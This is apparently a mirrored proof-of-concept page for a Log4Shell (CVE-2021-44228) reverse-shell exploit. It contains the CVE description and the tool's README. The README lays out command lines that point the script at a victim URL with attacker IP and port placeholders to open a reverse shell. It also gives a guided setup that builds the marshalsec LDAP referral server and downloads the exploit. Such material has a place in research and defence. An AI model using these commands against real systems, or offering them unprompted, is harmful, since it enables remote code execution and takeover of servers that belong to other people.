Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Log4j2 CVE-2021-44228 revshell, ofc it suck!!
Readme
# Log4j2-CVE-2021-44228-revshell

    
## Usage

    For reverse shell:
    $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    
    For check exploitable:
    $~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

    $~  python3 Log4j2-revshell.py -h
        usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                                  [-hp HTTPPORT] [-V]

        Log4j2 CVE-2021-44228 Reverse Shell

        optional arguments:
          -h, --help            show this help message and exit
          -M MODE, --mode MODE  Mode: check | rev
          -u TARGET, --target TARGET
                                Target full URL, http://www.victimLog4j.xyz:8080
          -l LHOST, --lhost LHOST
                                Attacker IP for receive revshell
          -p LPORT, --lport LPORT
                                Attacker port for receive revshell
          -hp HTTPPORT, --httpport HTTPPORT
                                HTTP server port on attacker host, default is 8888
          -V, --version         show program's version number and exit

## Requirement
    
    1. Marshalsec jndi.LDAPRefServer # see here, https://github.com/mbechler/marshalsec
    2. Java 8 # you can get Java 8 here https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
       suggested to install jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
    3. This script, Log4j2-revshell.py

## TLDR; Guided step
 
    $ Open browser and Download Java 8 from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
      In Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or appropriate package based on your OS.
        
    $ sudo mkdir /usr/lib/jvm #Make this dir if you do not have yet
    $ cd /usr/lib/jvm
    $ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extract downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
    $ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
    $ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
    $ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

    $ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
    $ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
    $ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
    $ java -version #verify if you are running Java 1.8.0_181
    
    $ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Install marshalsec jndi.LDAPRefServer
    $ sudo apt install -y maven #Build marshalsec with the Java builder maven. If you do not have maven, please install first
    $ mvn clean package -DskipTests #Build marshalsec tool with maven 
    $ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py
    
    $ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]
    

## PoC

    target host: http://192.168.5.122:8080
    attacker host: 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4


## Tested on
    
    - Ubuntu 18.04

## Disclaimer:

    The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
File Snapshot

 [4.0K]  /data/pocs/19badd7675867a448944af94f100df7c6c5bc2d7
├── [ 10K]  Log4j2-revshell.py
└── [3.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →